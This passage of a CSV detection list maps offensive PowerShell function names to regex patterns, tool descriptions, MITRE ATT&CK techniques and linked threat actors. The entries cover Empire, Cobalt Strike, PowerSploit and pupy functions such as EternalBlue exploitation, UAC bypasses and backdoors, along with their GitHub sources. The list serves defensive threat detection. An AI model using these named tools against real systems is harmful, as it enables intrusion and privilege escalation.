"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48997"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48998"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","48999"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49000"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49001"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49002"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49003"
"*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49004"
"*Invoke-EnvBypass -Command *",".{0,1000}Invoke\-EnvBypass\s\-Command\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49005"
"*Invoke-EnvBypass*",".{0,1000}Invoke\-EnvBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-BypassUACTokenManipulation.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49006"
"*Invoke-EnvBypass.*",".{0,1000}Invoke\-EnvBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49007"
"*Invoke-EnvBypass.ps1*",".{0,1000}Invoke\-EnvBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49008"
"*Invoke-EssessAgress*",".{0,1000}Invoke\-EssessAgress.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","49009"
"*Invoke-ESTSCookieToAccessToken*",".{0,1000}Invoke\-ESTSCookieToAccessToken.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","49010"
"*Invoke-EternalBlue*",".{0,1000}Invoke\-EternalBlue.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","49011"
"*Invoke-EternalBlue*",".{0,1000}Invoke\-EternalBlue.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49012"
"*Invoke-EternalBlue*",".{0,1000}Invoke\-EternalBlue.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49013"
"*invoke-eternalblue*",".{0,1000}invoke\-eternalblue.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49014"
"*Invoke-EventHunter*",".{0,1000}Invoke\-EventHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49015"
"*Invoke-EventHunter*",".{0,1000}Invoke\-EventHunter.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","49016"
"*invoke-eventhunter*",".{0,1000}invoke\-eventhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","49017"
"*Invoke-EventLogBackdoor*",".{0,1000}Invoke\-EventLogBackdoor.{0,1000}","offensive_tool_keyword","PowerBreach","PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system","T1055 - T1203 - T1105 - T1202 - T1027 - T1059 - T1070","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/PowerShellEmpire/PowerTools","1","1","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49018"
"*Invoke-EventViewer *.exe*",".{0,1000}Invoke\-EventViewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","49019"
"*Invoke-EventViewer.ps1*",".{0,1000}Invoke\-EventViewer\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","49020"
"*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","49021"
"*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - 